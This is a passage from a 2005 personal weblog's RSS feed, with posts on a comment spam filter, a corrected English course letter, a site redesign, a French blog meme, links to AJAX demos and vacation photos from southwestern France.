  8754. Dieses &quot;Wundermittel gegen den Spam&quot; habe ich nicht etwa selber entwickelt sondern ich habe einfach die <a href="http://www.phpclasses.org/spamfilter" title="PHP Classes - Class: Spam Filter">Spam Filter Klasse</a> von <a href="http://www.phpclasses.org/" title="PHP Classes">PHPClasses.org</a> an meine Bedürfnisse angepasst.<br>
  8755. Allen Spamgeplagten kann ich den Einsatz eines <a href="http://de.wikipedia.org/wiki/Bayesscher_Filter" title="Bayesscher Filter - Wikipedia">Bayes'schen Spamfilters</a> sehr empfehlen!
  8756. </p>
  8757. ]]></content:encoded>
  8758.  </item>
  8759.  
  8760.  <item>
  8761.    <title>FCE</title>
  8762.    <link>https://blog.x-way.org/School/2005/11/17/FCE.html</link>
  8763.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324074</guid>
  8764.    <dc:creator>Andreas Jaggi</dc:creator>
  8765.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  8766.    <pubDate>Thu, 17 Nov 2005 23:39:12 +0000</pubDate>
  8767.    <category domain="https://blog.x-way.org/School">School</category>
  8768.    <description><![CDATA[<p>
  8769. Since I didn't have English courses for almost five years and since I
  8770. plan to do an exchange year in 2006/2007, I'm actually following an
  8771. English preparation course for the Cambridge First Certificate in
  8772. English (FCE) with the target to do the certificate in July 2006.<br>The course is hold at the language center of the EPFL and is also paid by the EPFL (only the course, not the certificate).</p>
  8773. <p>
  8774. It seems that for the course I have to write a sample letter each week.
  8775. I thought this would be a good oppurtunity to easily add some English
  8776. content to this weblog and this way there are much more people who can
  8777. find mistakes and eventually give me some hints on how to improve my
  8778. writing skills :-)
  8779. </p>
  8780. <p>
  8781. There we go, here is the first letter we had to write, already with the corrections.
  8782. </p>
  8783. <br><br>
  8784. <blockquote>
  8785. <p>Dear Thomas,</p>
  8786. <p>
  8787. <del>Like</del><ins>As</ins> you probably know, I help at <ins>the</ins> &quot;Satellite&quot; and we're organizing a concert tomorrow.<br>
  8788. It's a concert <del>of</del><ins>with</ins> two post-rock groups called &quot;Rosqo&quot; and &quot;Beautiful Leopard&quot;.
  8789. </p>
  8790. <p>
  8791. &quot;Satellite&quot; is located on the second floor of the &quot;CM&quot; building of <ins>the</ins> EPFL. The concert starts at eight o'clock and finishes around midnight.
  8792. </p>
  8793. <p>
  8794. It seems that the two groups are quite popular, so please tell me if you can come as <del>fast</del><ins>soon</ins> as possible, so that I can reserve a ticket for you.
  8795. </p>
  8796. <p>
  8797. Since you're coming from Luzern there aren't any trains <del>at</del><ins>after</ins> midnight. But this isn't a problem, I'll organize a bed for you.
  8798. </p>
  8799. <p>
  8800. If you're not to<ins>o</ins> tired after the concert, we could go out to the city and visit some discos.
  8801. </p>
  8802. <p>Hope you'll come to the concert.</p>
  8803. <p>Best wishes</p>
  8804. <p>Andreas</p>
  8805. </blockquote>
  8806. ]]></description>
  8807.    <content:encoded><![CDATA[<p>
  8808. Since I didn't have English courses for almost five years and since I
  8809. plan to do an exchange year in 2006/2007, I'm actually following an
  8810. English preparation course for the Cambridge First Certificate in
  8811. English (FCE) with the target to do the certificate in July 2006.<br>The course is hold at the language center of the EPFL and is also paid by the EPFL (only the course, not the certificate).</p>
  8812. <p>
  8813. It seems that for the course I have to write a sample letter each week.
  8814. I thought this would be a good oppurtunity to easily add some English
  8815. content to this weblog and this way there are much more people who can
  8816. find mistakes and eventually give me some hints on how to improve my
  8817. writing skills :-)
  8818. </p>
  8819. <p>
  8820. There we go, here is the first letter we had to write, already with the corrections.
  8821. </p>
  8822. <br><br>
  8823. <blockquote>
  8824. <p>Dear Thomas,</p>
  8825. <p>
  8826. <del>Like</del><ins>As</ins> you probably know, I help at <ins>the</ins> &quot;Satellite&quot; and we're organizing a concert tomorrow.<br>
  8827. It's a concert <del>of</del><ins>with</ins> two post-rock groups called &quot;Rosqo&quot; and &quot;Beautiful Leopard&quot;.
  8828. </p>
  8829. <p>
  8830. &quot;Satellite&quot; is located on the second floor of the &quot;CM&quot; building of <ins>the</ins> EPFL. The concert starts at eight o'clock and finishes around midnight.
  8831. </p>
  8832. <p>
  8833. It seems that the two groups are quite popular, so please tell me if you can come as <del>fast</del><ins>soon</ins> as possible, so that I can reserve a ticket for you.
  8834. </p>
  8835. <p>
  8836. Since you're coming from Luzern there aren't any trains <del>at</del><ins>after</ins> midnight. But this isn't a problem, I'll organize a bed for you.
  8837. </p>
  8838. <p>
  8839. If you're not to<ins>o</ins> tired after the concert, we could go out to the city and visit some discos.
  8840. </p>
  8841. <p>Hope you'll come to the concert.</p>
  8842. <p>Best wishes</p>
  8843. <p>Andreas</p>
  8844. </blockquote>
  8845. ]]></content:encoded>
  8846.  </item>
  8847.  
  8848.  <item>
  8849.    <title>CSS Reboot Fall 2005</title>
  8850.    <link>https://blog.x-way.org/Webdesign/2005/11/01/CSS-Reboot-Fall-2005.html</link>
  8851.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324073</guid>
  8852.    <dc:creator>Andreas Jaggi</dc:creator>
  8853.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  8854.    <pubDate>Tue, 01 Nov 2005 00:00:00 +0000</pubDate>
  8855.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  8856.    <description><![CDATA[<p>Am Wochenende bin ich per Zufall auf die <a href="http://www.cssreboot.com/" title="CSS Reboot Fall 2005">CSS Reboot</a> Seite gestossen.<br>Da ich am Sonntag Nachmittag nichts Interessantes vorhatte, ist innerhalb eines Tages das neue Design entstanden :-)</p>
  8857.  
  8858. <p>Wer immernoch das mittlerweile etwas verbleichte alte Layout sieht, soll bitte <a href="http://waterwave.ch/weblog/set.php?skin=o5">hier klicken</a> um zum neuen zu wechseln.</p>
  8859.  
  8860. <p>In <a href="https://www.mozilla.org/en-US/firefox/" title="Spread Firefox | Igniting the web">Mozilla Firefox</a>, <a href="http://www.opera.com/" title="Opera Web Browser">Opera</a> und <a href="http://www.apple.com/safari/" title="Apple - Safari">Safari</a> sieht die Seite ziemlich genau so aus wie gewünscht, aber im Internet Explorer stimmt wiedereinmal gar nichts :-(</p>
  8861. ]]></description>
  8862.    <content:encoded><![CDATA[<p>Am Wochenende bin ich per Zufall auf die <a href="http://www.cssreboot.com/" title="CSS Reboot Fall 2005">CSS Reboot</a> Seite gestossen.<br>Da ich am Sonntag Nachmittag nichts Interessantes vorhatte, ist innerhalb eines Tages das neue Design entstanden :-)</p>
  8863.  
  8864. <p>Wer immernoch das mittlerweile etwas verbleichte alte Layout sieht, soll bitte <a href="http://waterwave.ch/weblog/set.php?skin=o5">hier klicken</a> um zum neuen zu wechseln.</p>
  8865.  
  8866. <p>In <a href="https://www.mozilla.org/en-US/firefox/" title="Spread Firefox | Igniting the web">Mozilla Firefox</a>, <a href="http://www.opera.com/" title="Opera Web Browser">Opera</a> und <a href="http://www.apple.com/safari/" title="Apple - Safari">Safari</a> sieht die Seite ziemlich genau so aus wie gewünscht, aber im Internet Explorer stimmt wiedereinmal gar nichts :-(</p>
  8867. ]]></content:encoded>
  8868.  </item>
  8869.  
  8870.  <item>
  8871.    <title>Lancer le bâton</title>
  8872.    <link>https://blog.x-way.org/Misc/2005/10/30/Lancer-le-baton.html</link>
  8873.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324072</guid>
  8874.    <dc:creator>Andreas Jaggi</dc:creator>
  8875.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  8876.    <pubDate>Sun, 30 Oct 2005 00:18:13 +0000</pubDate>
  8877.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  8878.    <description><![CDATA[<p><a href="https://kniebes.com/2005/10/28/und-jetzt-franzoesisch" title="Und jetzt französisch">Markus</a> bewirft mich wegen den Französischkenntnissen mit Stöckchen!</p>
  8879.  
  8880. <blockquote lang="fr" cite="https://kniebes.com/2005/10/28/und-jetzt-franzoesisch">
  8881. <ol>
  8882. <li>Allez dans vos archives.</li>
  8883.  
  8884. <li>Retrouvez la 23e note ou celle proche de ce chiffre.</li>
  8885.  
  8886. <li>Retrouvez la 5e phrase.</li>
  8887.  
  8888. <li>Affichez le texte de la phrase ainsi que ces instructions.</li>
  8889.  
  8890. <li>Demandez &#224; 5 personnes que vous aimez lire d&#8217;en faire autant.</li>
  8891. </ol>
  8892. </blockquote>
  8893.  
  8894. <p>Voil&#224;, der fünfte Satz aus dem <a href="http://waterwave.ch/weblog/24" title="Endlich...">dreiundzwanzigsten Eintrag</a>:</p>
  8895.  
  8896. <blockquote cite="http://waterwave.ch/weblog/24"><p><b>Yeehaw!</b></p>
  8897. </blockquote>
  8898.  
  8899. <p>Das Stöckchen an fünf Personen weiterreichen, welche ich gerne lese?<br>
  8900. Mal schauen was die Linkliste so hergibt:</p>
  8901.  
  8902. <ul>
  8903. <li><a href="#" title="sunflyer.ch" class="gone">Andreas</a></li>
  8904.  
  8905. <li><a href="http://www.pepilog.de/" title="Pepilog">Pepino</a></li>
  8906.  
  8907. <li><a href="https://web.archive.org/web/20051025050505/http://www.metamorphine.de/" title="metamorphine (archive.org)">dee</a></li>
  8908.  
  8909. <li><a href="https://web.archive.org/web/20051122134554/http://blog.0xfce3.net/" title="mindtrap::weblog (archive.org)">Gordon</a></li>
  8910.  
  8911. <li><a href="http://theflow.de/" title="theflow.de">Flo</a></li>
  8912. </ul>
  8913. ]]></description>
  8914.    <content:encoded><![CDATA[<p><a href="https://kniebes.com/2005/10/28/und-jetzt-franzoesisch" title="Und jetzt französisch">Markus</a> bewirft mich wegen den Französischkenntnissen mit Stöckchen!</p>
  8915.  
  8916. <blockquote lang="fr" cite="https://kniebes.com/2005/10/28/und-jetzt-franzoesisch">
  8917. <ol>
  8918. <li>Allez dans vos archives.</li>
  8919.  
  8920. <li>Retrouvez la 23e note ou celle proche de ce chiffre.</li>
  8921.  
  8922. <li>Retrouvez la 5e phrase.</li>
  8923.  
  8924. <li>Affichez le texte de la phrase ainsi que ces instructions.</li>
  8925.  
  8926. <li>Demandez &#224; 5 personnes que vous aimez lire d&#8217;en faire autant.</li>
  8927. </ol>
  8928. </blockquote>
  8929.  
  8930. <p>Voil&#224;, der fünfte Satz aus dem <a href="http://waterwave.ch/weblog/24" title="Endlich...">dreiundzwanzigsten Eintrag</a>:</p>
  8931.  
  8932. <blockquote cite="http://waterwave.ch/weblog/24"><p><b>Yeehaw!</b></p>
  8933. </blockquote>
  8934.  
  8935. <p>Das Stöckchen an fünf Personen weiterreichen, welche ich gerne lese?<br>
  8936. Mal schauen was die Linkliste so hergibt:</p>
  8937.  
  8938. <ul>
  8939. <li><a href="#" title="sunflyer.ch" class="gone">Andreas</a></li>
  8940.  
  8941. <li><a href="http://www.pepilog.de/" title="Pepilog">Pepino</a></li>
  8942.  
  8943. <li><a href="https://web.archive.org/web/20051025050505/http://www.metamorphine.de/" title="metamorphine (archive.org)">dee</a></li>
  8944.  
  8945. <li><a href="https://web.archive.org/web/20051122134554/http://blog.0xfce3.net/" title="mindtrap::weblog (archive.org)">Gordon</a></li>
  8946.  
  8947. <li><a href="http://theflow.de/" title="theflow.de">Flo</a></li>
  8948. </ul>
  8949. ]]></content:encoded>
  8950.  </item>
  8951.  
  8952.  <item>
  8953.    <title>Démos d'AJAX</title>
  8954.    <link>https://blog.x-way.org/Webdesign/2005/09/09/Demos-dAJAX.html</link>
  8955.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324071</guid>
  8956.    <dc:creator>Andreas Jaggi</dc:creator>
  8957.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  8958.    <pubDate>Fri, 09 Sep 2005 14:39:59 +0000</pubDate>
  8959.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  8960.    <description><![CDATA[<p>Voil&#233; quelques liens vers des d&#233;mos d&#8217;AJAX.</p>
  8961.  
  8962. <ul>
  8963. <li><a href="https://web.archive.org/web/20050924051639/http://wiki.script.aculo.us/scriptaculous/show/Demos" title="Demos in script.aculo.us Wiki (archive.org)">Demos in script.aculo.us Wiki</a></li>
  8964.  
  8965. <li><a href="https://web.archive.org/web/20050908014420/http://files.kniebes.net/php/RSSReader/" title="RSSReader (archive.org)">RSSReader</a></li>
  8966.  
  8967. <li><a href="https://web.archive.org/web/20050920045151/http://www.couloir.org/" title="Couloir (archive.org)">Couloir</a></li>
  8968.  
  8969. <li><a href="http://tiddlywiki.com/" title="TiddlyWiki">TiddlyWiki</a></li>
  8970.  
  8971. <li><a href="http://www.masswerk.at/jsuix/index.html" title="JS/UIX - Terminal">JS/UIX - Terminal</a></li>
  8972.  
  8973. <li><a href="https://web.archive.org/web/20050923124715/http://openrico.org/rico/demos.page" title="Rico (archive.org)">Rico</a></li>
  8974.  
  8975. <li><a href="https://web.archive.org/web/20051213013834/http://www.ajaxify.com/run/wiki/status/" title="Ajax Status Wiki Demo (archive.org)">Ajax Status Wiki Demo</a></li>
  8976.  
  8977. <li><a href="https://web.archive.org/web/20050930234358/http://www.backbase.com/demos/RSS/" title="Backbase AJAX RSS Reader (archive.org)">Backbase AJAX RSS Reader</a></li>
  8978.  
  8979. <li><a href="https://web.archive.org/web/20050913024154/http://www.formassembly.com/form-garden.php" title="The Form Assembly Garden (archive.org)">The Form Assembly Garden</a></li>
  8980.  
  8981. <li><a href="https://web.archive.org/web/20050923204403/http://code.jalenack.com/periodic/" title="Jalenacks AJAX Periodic Table of the Elements (archive.org)">Jalenack&#8217;s AJAX Periodic Table of the Elements</a></li>
  8982.  
  8983. <li><a href="http://colr.org/" title="colr.org">colr.org</a></li>
  8984.  
  8985. <li><a href="http://www.mochikit.com/demos.html" title="MochiKit - Demos">MochiKit - Demos</a></li>
  8986.  
  8987. <li><a href="https://web.archive.org/web/20050924000321/http://ajaxpatterns.org/Ajax_Examples" title="Ajax Examples - Ajax Patterns (archive.org)">Ajax Examples - Ajax Patterns</a></li>
  8988. </ul>
  8989. ]]></description>
  8990.    <content:encoded><![CDATA[<p>Voil&#233; quelques liens vers des d&#233;mos d&#8217;AJAX.</p>
  8991.  
  8992. <ul>
  8993. <li><a href="https://web.archive.org/web/20050924051639/http://wiki.script.aculo.us/scriptaculous/show/Demos" title="Demos in script.aculo.us Wiki (archive.org)">Demos in script.aculo.us Wiki</a></li>
  8994.  
  8995. <li><a href="https://web.archive.org/web/20050908014420/http://files.kniebes.net/php/RSSReader/" title="RSSReader (archive.org)">RSSReader</a></li>
  8996.  
  8997. <li><a href="https://web.archive.org/web/20050920045151/http://www.couloir.org/" title="Couloir (archive.org)">Couloir</a></li>
  8998.  
  8999. <li><a href="http://tiddlywiki.com/" title="TiddlyWiki">TiddlyWiki</a></li>
  9000.  
  9001. <li><a href="http://www.masswerk.at/jsuix/index.html" title="JS/UIX - Terminal">JS/UIX - Terminal</a></li>
  9002.  
  9003. <li><a href="https://web.archive.org/web/20050923124715/http://openrico.org/rico/demos.page" title="Rico (archive.org)">Rico</a></li>
  9004.  
  9005. <li><a href="https://web.archive.org/web/20051213013834/http://www.ajaxify.com/run/wiki/status/" title="Ajax Status Wiki Demo (archive.org)">Ajax Status Wiki Demo</a></li>
  9006.  
  9007. <li><a href="https://web.archive.org/web/20050930234358/http://www.backbase.com/demos/RSS/" title="Backbase AJAX RSS Reader (archive.org)">Backbase AJAX RSS Reader</a></li>
  9008.  
  9009. <li><a href="https://web.archive.org/web/20050913024154/http://www.formassembly.com/form-garden.php" title="The Form Assembly Garden (archive.org)">The Form Assembly Garden</a></li>
  9010.  
  9011. <li><a href="https://web.archive.org/web/20050923204403/http://code.jalenack.com/periodic/" title="Jalenacks AJAX Periodic Table of the Elements (archive.org)">Jalenack&#8217;s AJAX Periodic Table of the Elements</a></li>
  9012.  
  9013. <li><a href="http://colr.org/" title="colr.org">colr.org</a></li>
  9014.  
  9015. <li><a href="http://www.mochikit.com/demos.html" title="MochiKit - Demos">MochiKit - Demos</a></li>
  9016.  
  9017. <li><a href="https://web.archive.org/web/20050924000321/http://ajaxpatterns.org/Ajax_Examples" title="Ajax Examples - Ajax Patterns (archive.org)">Ajax Examples - Ajax Patterns</a></li>
  9018. </ul>
  9019. ]]></content:encoded>
  9020.  </item>
  9021.  
  9022.  <item>
  9023.    <title>Fight Spam</title>
  9024.    <link>https://blog.x-way.org/Coding/2005/08/07/Fight-Spam.html</link>
  9025.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324070</guid>
  9026.    <dc:creator>Andreas Jaggi</dc:creator>
  9027.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  9028.    <pubDate>Sun, 07 Aug 2005 12:49:48 +0000</pubDate>
  9029.    <category domain="https://blog.x-way.org/Coding">Coding</category>
  9030.    <description><![CDATA[<p>Since this weblog received about 100 spam comments last week, i implemented a simple spam-filter based on a badwords list.<br>
  9031. If a comments text contains more than four occurences of the following
  9032. words, it won't get added and the user is redirected to the mainpage.</p>
  9033.  
  9034. <p>Thanks to very specific spam content, it only needs a small list of badwords to detect the spam.</p>
  9035.  
  9036. <ul>
  9037. <li>texas</li>
  9038.  
  9039. <li>holdem</li>
  9040.  
  9041. <li>casino</li>
  9042.  
  9043. <li>poker</li>
  9044. </ul>
  9045. <p>This is just a simple anti-spam mechanism, but for now it works perfect and i hope it remains so for a long time :-)</p>
  9046. ]]></description>
  9047.    <content:encoded><![CDATA[<p>Since this weblog received about 100 spam comments last week, i implemented a simple spam-filter based on a badwords list.<br>
  9048. If a comments text contains more than four occurences of the following
  9049. words, it won't get added and the user is redirected to the mainpage.</p>
  9050.  
  9051. <p>Thanks to very specific spam content, it only needs a small list of badwords to detect the spam.</p>
  9052.  
  9053. <ul>
  9054. <li>texas</li>
  9055.  
  9056. <li>holdem</li>
  9057.  
  9058. <li>casino</li>
  9059.  
  9060. <li>poker</li>
  9061. </ul>
  9062. <p>This is just a simple anti-spam mechanism, but for now it works perfect and i hope it remains so for a long time :-)</p>
  9063. ]]></content:encoded>
  9064.  </item>
  9065.  
  9066.  <item>
  9067.    <title>Les Landes 2005 - Teil 1</title>
  9068.    <link>https://blog.x-way.org/Misc/2005/08/01/Les-Landes-2005---Teil-1.html</link>
  9069.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=324069</guid>
  9070.    <dc:creator>Andreas Jaggi</dc:creator>
  9071.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  9072.    <pubDate>Mon, 01 Aug 2005 02:08:02 +0000</pubDate>
  9073.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  9074.    <description><![CDATA[<p><q>Um 20.30h fängt der Film an. Wenn du den Zug nimmst, der in zehn Minuten fährt, reichts noch!</q><br>
  9075. Und so habe ich mir am Freitag vor zwei Wochen noch schnell <a href="http://www.imdb.com/title/tt0356910/" title="Mehr über den Film bei IMDb">Mr. &amp; Mrs. Smith</a>
  9076. angeschaut. Als ich nach dem Kinobesuch wieder Zuhause angekommen war,
  9077. musste ich mich beeilen um noch meine Sachen zu packen damit wir um
  9078. vier Uhr morgens in Richtung Frankreich losfahren konnten.
  9079. Wir verbrachten unsere Ferien nocheinmal im Derpartement des Landes in
  9080. Moustey. Da ich auch meine Digitalkamera mitgenommen hatte, gibts
  9081. diesmal sogar ein paar Bilder.</p>
  9082. <br><br>
  9083. <dl class="tdl">
  9084. <dt class="tdla">
  9085. <a href="https://blog.x-way.org/images/landes05_01.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_01_t.jpg" alt="Blick zur Tür hinaus" title="Klick für grössere Ansicht"></a>
  9086. </dt>
  9087. <dd class="tdla">Blick zur Tür hinaus</dd>
  9088. <dt class="tdlb">
  9089. <a href="https://blog.x-way.org/images/landes05_02.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_02_t.jpg" alt="Les Landes ist voller Pinien" title="Klick für grössere Ansicht"></a>
  9090. </dt>
  9091. <dd class="tdlb">Les Landes ist voller Pinien</dd>
  9092. <dt class="tdla">
  9093. <a href="https://blog.x-way.org/images/landes05_03.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_03_t.jpg" alt="Pomme de pin" title="Klick für grössere Ansicht"></a>
  9094. </dt>
  9095. <dd class="tdla">Pomme de pin</dd>
  9096. <dt class="tdlb">
  9097. <a href="https://blog.x-way.org/images/landes05_06.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_06_t.jpg" alt="Ein Glühwürmchen photographiert mit Infrarot" title="Klick für grössere Ansicht"></a>
  9098. </dt>
  9099. <dd class="tdlb">Ein Glühwürmchen photographiert mit Infrarot</dd>
  9100. <dt class="tdla">
  9101. <a href="https://blog.x-way.org/images/landes05_07.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_07_t.jpg" alt="und mit Blitzlicht" title="Klick für grössere Ansicht"></a>
  9102. </dt>
  9103. <dd class="tdla">und mit Blitzlicht</dd>
  9104. <dt class="tdlb">
  9105. <a href="https://blog.x-way.org/images/landes05_08.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_08_t.jpg" alt="Mond, Belichtungszeit 30 Sekunden" title="Klick für grössere Ansicht"></a>
  9106. </dt>
  9107. <dd class="tdlb">Mond, Belichtungszeit 30 Sekunden</dd>
  9108. <dt class="tdla">
  9109. <a href="https://blog.x-way.org/images/landes05_09.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_09_t.jpg" alt="Mond, Belichtungszeit 10 Sekunden" title="Klick für grössere Ansicht"></a>
  9110. </dt>
  9111. <dd class="tdlb">Mond, Belichtungszeit 10 Sekunden</dd>
  9112. <dt class="tdlb">
  9113. <a href="https://blog.x-way.org/images/landes05_10.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_10_t.jpg" alt="Mond, Belichtungszeit 30 Sekunden" title="Klick für grössere Ansicht"></a>
  9114. </dt>
  9115. <dd class="tdlb">Mond, Belichtungszeit 30 Sekunden</dd>
  9116. <dt class="tdla">
  9117. <a href="https://blog.x-way.org/images/landes05_11.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_11_t.jpg" alt="Eine Eidechse" title="Klick für grössere Ansicht"></a>
  9118. </dt>
  9119. <dd class="tdla">Eine Eidechse</dd>
  9120. <dt class="tdlb">
  9121. <a href="https://blog.x-way.org/images/landes05_12.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_12_t.jpg" alt="Zwei Eidechsen" title="Klick für grössere Ansicht"></a>
  9122. </dt>
  9123. <dd class="tdlb">Zwei Eidechsen</dd>
  9124. <dt class="tdla">
  9125. <a href="https://blog.x-way.org/images/landes05_13.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_13_t.jpg" alt="Spezieller Grashüpfer" title="Klick für grössere Ansicht"></a>
  9126. </dt>
  9127. <dd class="tdla">Spezieller Grashüpfer</dd>
  9128. <dt class="tdlb">
  9129. <a href="https://blog.x-way.org/images/landes05_14.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_14_t.jpg" alt="Viaduc de Millau" title="Klick für grössere Ansicht"></a>
  9130. </dt>
  9131. <dd class="tdlb">Auf dem Rückweg überquerten wir den <a href="https://web.archive.org/web/20050801234231/www.viaducdemillau.com" title="Viaduc de Millau (archive.org)">Viaduc de Millau</a></dd>
  9132. <dt class="tdla">
  9133. <a href="https://blog.x-way.org/images/landes05_15.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_15_t.jpg" alt="Viaduc de Millau" title="Klick für grössere Ansicht"></a>
  9134. </dt>
  9135. <dd class="tdla"><a href="https://web.archive.org/web/20050801234231/www.viaducdemillau.com" title="Viaduc de Millau (archive.org)">Viaduc de Millau</a></dd>
  9136. <dt class="tdlb">
  9137. <a href="https://blog.x-way.org/images/landes05_16.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_16_t.jpg" alt="Viaduc de Millau" title="Klick für grössere Ansicht"></a>
  9138. </dt>
  9139. <dd class="tdlb"><a href="https://web.archive.org/web/20050801234231/www.viaducdemillau.com" title="Viaduc de Millau (archive.org)">Viaduc de Millau</a></dd>
  9140. <dt class="tdla">
  9141. <a href="https://blog.x-way.org/images/landes05_17.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_17_t.jpg" alt="Brücke von Les Vignes" title="Klick für grössere Ansicht"></a>
  9142. </dt>
  9143. <dd class="tdla">Brücke von Les Vignes</dd>
  9144. <dt class="tdlb">
  9145. <a href="https://blog.x-way.org/images/landes05_18.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_18_t.jpg" alt="Felsformation bei Les Vignes" title="Klick für grössere Ansicht"></a>
  9146. </dt>
  9147. <dd class="tdlb">Felsformation bei Les Vignes</dd>
  9148. <dt class="tdlb">
  9149. <a href="https://blog.x-way.org/images/landes05_04.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_04_t.jpg" alt="Ferienlektüre" title="Klick für grössere Ansicht"></a>
  9150. </dt>
  9151. <dd class="tdlb">Ferienlektüre</dd>
  9152. <dt class="tdla">
  9153. <a href="https://blog.x-way.org/images/landes05_05.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_05_t.jpg" alt="" title="Klick für grössere Ansicht"></a>
  9154. </dt>
  9155. <dd class="tdlb"></dd>
  9156. </dl>
  9157.  
  9158. ]]></description>
  9159.    <content:encoded><![CDATA[<p><q>Um 20.30h fängt der Film an. Wenn du den Zug nimmst, der in zehn Minuten fährt, reichts noch!</q><br>
  9160. Und so habe ich mir am Freitag vor zwei Wochen noch schnell <a href="http://www.imdb.com/title/tt0356910/" title="Mehr über den Film bei IMDb">Mr. &amp; Mrs. Smith</a>
  9161. angeschaut. Als ich nach dem Kinobesuch wieder Zuhause angekommen war,
  9162. musste ich mich beeilen um noch meine Sachen zu packen damit wir um
  9163. vier Uhr morgens in Richtung Frankreich losfahren konnten.
  9164. Wir verbrachten unsere Ferien nocheinmal im Derpartement des Landes in
  9165. Moustey. Da ich auch meine Digitalkamera mitgenommen hatte, gibts
  9166. diesmal sogar ein paar Bilder.</p>
  9167. <br><br>
  9168. <dl class="tdl">
  9169. <dt class="tdla">
  9170. <a href="https://blog.x-way.org/images/landes05_01.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_01_t.jpg" alt="Blick zur Tür hinaus" title="Klick für grössere Ansicht"></a>
  9171. </dt>
  9172. <dd class="tdla">Blick zur Tür hinaus</dd>
  9173. <dt class="tdlb">
  9174. <a href="https://blog.x-way.org/images/landes05_02.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_02_t.jpg" alt="Les Landes ist voller Pinien" title="Klick für grössere Ansicht"></a>
  9175. </dt>
  9176. <dd class="tdlb">Les Landes ist voller Pinien</dd>
  9177. <dt class="tdla">
  9178. <a href="https://blog.x-way.org/images/landes05_03.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_03_t.jpg" alt="Pomme de pin" title="Klick für grössere Ansicht"></a>
  9179. </dt>
  9180. <dd class="tdla">Pomme de pin</dd>
  9181. <dt class="tdlb">
  9182. <a href="https://blog.x-way.org/images/landes05_06.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_06_t.jpg" alt="Ein Glühwürmchen photographiert mit Infrarot" title="Klick für grössere Ansicht"></a>
  9183. </dt>
  9184. <dd class="tdlb">Ein Glühwürmchen photographiert mit Infrarot</dd>
  9185. <dt class="tdla">
  9186. <a href="https://blog.x-way.org/images/landes05_07.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_07_t.jpg" alt="und mit Blitzlicht" title="Klick für grössere Ansicht"></a>
  9187. </dt>
  9188. <dd class="tdla">und mit Blitzlicht</dd>
  9189. <dt class="tdlb">
  9190. <a href="https://blog.x-way.org/images/landes05_08.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_08_t.jpg" alt="Mond, Belichtungszeit 30 Sekunden" title="Klick für grössere Ansicht"></a>
  9191. </dt>
  9192. <dd class="tdlb">Mond, Belichtungszeit 30 Sekunden</dd>
  9193. <dt class="tdla">
  9194. <a href="https://blog.x-way.org/images/landes05_09.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_09_t.jpg" alt="Mond, Belichtungszeit 10 Sekunden" title="Klick für grössere Ansicht"></a>
  9195. </dt>
  9196. <dd class="tdlb">Mond, Belichtungszeit 10 Sekunden</dd>
  9197. <dt class="tdlb">
  9198. <a href="https://blog.x-way.org/images/landes05_10.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_10_t.jpg" alt="Mond, Belichtungszeit 30 Sekunden" title="Klick für grössere Ansicht"></a>
  9199. </dt>
  9200. <dd class="tdlb">Mond, Belichtungszeit 30 Sekunden</dd>
  9201. <dt class="tdla">
  9202. <a href="https://blog.x-way.org/images/landes05_11.jpg" title="Klick für grössere Ansicht"><img src="https://blog.x-way.org/images/landes05_11_t.jpg" alt="Eine Eidechse" title="Klick für grössere Ansicht"></a>
  9203. </dt>
  9204. <dd class="tdla">Eine Eidechse</dd>
  9205. <dt class="tdlb">
